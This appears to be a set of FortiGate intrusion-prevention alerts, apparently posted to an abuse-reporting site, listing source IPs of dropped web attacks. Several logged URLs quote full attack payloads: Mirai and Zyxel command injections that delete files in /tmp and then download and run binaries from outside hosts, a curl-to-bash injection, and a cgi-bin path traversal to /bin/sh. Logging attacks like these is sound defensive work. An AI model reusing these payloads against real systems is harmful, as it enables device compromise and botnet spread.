🇷🇴
92.118.39.245
date=2023-08-26 time=02:24:09 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693005849315560308 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=92.118.39.245 srccountry="Romania" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28439649 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=60368 dstport=80 hostname="136.255.207.206" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://136.255.207.206:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5502267 msg="applications3: Multiple.Routers.GPON.formLogin.Remote.Command.
Web App Attack
🇻🇳
115.78.10.124
date=2023-08-26 time=11:53:47 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693040027360768488 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=115.78.10.124 srccountry="Vietnam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28566415 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=33000 dstport=80 hostname="81.196.84.26" url="/api" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5503929 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇨🇳
103.59.112.92
date=2023-08-26 time=21:07:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693073279022312816 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=103.59.112.92 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28707588 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Mirai.Botnet" srcport=41690 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" agent="Hello, world" httpmethod="GET" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=5505183 msg="backdoor: Mirai.Botnet" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇨🇳
101.74.200.170
date=2023-08-27 time=08:19:13 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693113553025805811 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=101.74.200.170 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28851293 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Mirai.Botnet" srcport=53934 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws" agent="Hello, world" httpmethod="GET" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=5506475 msg="backdoor: Mirai.Botnet" crscore=30 craction=8192 crlevel="high
Web App Attack
🇩🇪
176.97.210.61
date=2023-08-27 time=09:01:50 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693116110930052456 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=176.97.210.61 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28860360 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=52536 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5506585 msg="applications3: Multiple.Routers.GPON.formLogin.Remote.C
Web App Attack
🇳🇱
94.156.6.167
date=2023-08-27 time=09:07:43 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693116463211743199 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=94.156.6.167 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28861572 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="AndroxGh0st.Malware" srcport=55635 dstport=80 hostname="api.gn.directpharma.ro" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5506592 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇫🇷
213.5.130.61
date=2023-08-27 time=12:25:57 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693128357374843339 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=213.5.130.61 srccountry="France" dstip=192.168.10.12 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28904437 action="dropped" proto=6 service="HTTP" policyid=79 poluuid="77aa622c-b8d9-51ed-64c5-d67d0270f5a9" policytype="policy" attack="HTTP.Unix.Shell.IFS.Remote.Code.Execution" srcport=48634 dstport=80 hostname="81.196.84.26" url="/online&kill-id=1;sudo$%7BIFS%7Dcurl$%7BIFS%7Dhttp://45.95.147.183/b.sh$%7BIFS%7D%7C$%7BIFS%7Dbash;" agent="python-requests/2.25.1" httpmethod="GET" direction="outgoing" attackid=45677 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45677" incidentserialno=5507154 msg="misc: HTTP.Unix.Shell.IFS.Remote.Code.Execution" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇩🇪
81.161.229.149
date=2023-08-27 time=12:58:17 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693130297765219275 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=81.161.229.149 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28911817 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=63620 dstport=80 hostname="81.196.84.26" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5507206 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇷🇺
83.97.73.87
date=2023-08-30 time=13:07:19 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693390039437684001 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=83.97.73.87 srccountry="Russian Federation" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30830000 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Generic.XXE.Detection" srcport=53122 dstport=80 hostname="81.196.84.26" url="/Autodiscover/Autodiscover.xml" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=32416 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID32416" incidentserialno=5816284 msg="applications3: Generic.XXE.Detection" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇺🇸
85.239.240.253
date=2023-08-27 time=14:26:52 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693135612854600753 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=85.239.240.253 srccountry="United States" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28931883 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="AndroxGh0st.Malware" srcport=58809 dstport=80 hostname="136.255.207.206" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5507443 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇭🇰
219.79.89.33
date=2023-08-27 time=14:38:20 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693136300485722777 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=219.79.89.33 srccountry="Hong Kong" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28934906 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=51972 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.211/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5507456 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096
Web App Attack
🇩🇪
193.35.18.177
date=2023-08-27 time=18:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693150692732276577 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=193.35.18.177 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28990216 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="PHPUnit.Eval-stdin.PHP.Remote.Code.Execution" srcport=42536 dstport=80 hostname="81.196.84.26" url="/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" agent="Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=45765 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45765" incidentserialno=5507959 msg="web_server: PHPUnit.Eval-stdin.PHP.Remote.Code.Execution" crscor
Web App Attack
🇧🇪
45.156.128.12
date=2023-08-28 time=00:45:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693172759778285480 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=45.156.128.12 srccountry="Portugal" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29071821 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="MS.Windows.HTTP.sys.Request.Handling.Remote.Code.Execution" srcport=43058 dstport=80 hostname="136.255.207.206" url="/" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=40402 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID40402" incidentserialno=5508710 msg="web_server: MS.Windows.HTTP.sys.Request.Handling.Remote.Code.Execution" crscore=50 craction=4096
Web App Attack
🇬🇧
157.231.51.20
date=2023-08-28 time=13:10:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693217459166217251 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=157.231.51.20 srccountry="United Kingdom" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29437804 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=36061 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5581036 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096
Web App Attack
🇨🇳
111.42.95.131
date=2023-08-28 time=19:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693240692586177946 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=111.42.95.131 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29677469 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Apache.HTTP.Server.cgi-bin.Path.Traversal" srcport=60824 dstport=80 hostname="136.255.207.206" url="/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" agent="Custom-AsyncHttpClient" httpmethod="POST" direction="outgoing" attackid=50825 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID50825" incidentserialno=5637412 msg="apache: Apache.HTTP.Server.cgi-bin.Path.Traversal" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇨🇳
14.122.168.114
date=2023-08-29 time=11:19:44 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693297184728675152 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=14.122.168.114 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30037482 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Zivif.PR115-204-P-RS.Web.Cameras.Credentials.Disclosure" srcport=22800 dstport=80 hostname="81.196.84.26" url="/web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr" agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" httpmethod="GET" direction="outgoing" attackid=45492 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45492" incidentserialno=5680118 msg="applications: Zivif.PR115-204-P-RS.Web.Cameras.Credentials.Disclosure" crscore=50
Web App Attack
🇮🇳
198.23.251.118
date=2023-08-29 time=12:02:45 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693299765864661481 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=198.23.251.118 srccountry="United States" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30071125 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Atlassian.Confluence.CVE-2021-26084.Remote.Code.Execution" srcport=44104 dstport=80 hostname="81.196.84.26" url="/pages/createpage-entervariables.action" agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=50727 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID50727" incidentserialno=5688539
Web App Attack
🇷🇺
83.97.73.87
date=2023-08-29 time=12:23:34 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693301014910523476 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="medium" srcip=83.97.73.87 srccountry="Russian Federation" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30087433 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Apache.Solr.SolrResourceLoader.Directory.Traversal" srcport=54008 dstport=80 hostname="81.196.84.26" url="/solr/admin/info/system?wt=json" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=37677 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID37677" incidentserialno=5692502 msg="apache: Apache.Solr.SolrResourceLoader.Directory.Traversal"
Web App Attack
🇻🇳
14.225.252.51
date=2023-08-29 time=13:18:55 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693304335827620827 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=14.225.252.51 srccountry="Vietnam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30128330 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Dasan.GPON.Remote.Code.Execution" srcport=53664 dstport=80 url="/GponForm/diag_Form?images/" agent="Hello, World" httpmethod="POST" direction="outgoing" attackid=46083 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID46083" incidentserialno=5699587 msg="applications3: Dasan.GPON.Remote.Code.Execution" crscore=50 craction=4096 crlevel="critical"
Web App Attack
🇮🇳
43.158.213.246
date=2023-08-29 time=13:46:16 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693305976575098371 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=43.158.213.246 srccountry="India" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30150983 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Backdoor.Cobalt.Strike.Beacon" srcport=34996 dstport=80 hostname="81.196.84.26" url="/jquery-3.3.1.min.js" agent="'Mozilla/5.0" httpmethod="GET" referralurl="http://code.jquery.com/" direction="outgoing" attackid=39078 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID39078" incidentserialno=5703264 msg="backdoor: Backdoor.Cobalt.Strike.Beacon" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇳🇱
141.98.6.77
date=2023-08-29 time=15:14:02 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693311242641191928 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=141.98.6.77 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30229566 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=56642 dstport=80 hostname="81.196.84.26" url="/" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5718470 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
Web App Attack
🇳🇱
84.54.51.146
date=2023-08-29 time=15:34:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693312458957066028 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=84.54.51.146 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30247363 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=46622 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5722681 msg="applications3: Multiple.Routers.GPON.formLogin.Remote
Web App Attack
🇧🇪
45.156.128.7
date=2023-08-29 time=18:22:07 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693322527209168682 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=45.156.128.7 srccountry="Portugal" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30333313 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Telerik.Web.UI.RadAsyncUpload.Handling.Arbitrary.File.Upload" srcport=57766 dstport=80 hostname="81.196.84.26" url="/Telerik.Web.UI.WebResource.axd?type=rau" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=48789 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID48789" incidentserialno=5735552 msg="applications3: Telerik.Web.UI.RadAsyncUpload
Web App Attack
🇬🇺
202.128.92.209
date=2023-08-29 time=18:37:36 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693323456836404196 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=202.128.92.209 srccountry="Guam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30338066 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=52158 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.211/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5735741 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096 crlevel="critic
Web App Attack
🇳🇱
84.54.51.99
date=2023-08-29 time=20:07:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693328838377606929 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=84.54.51.99 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30364312 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=49678 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5736678
Web App Attack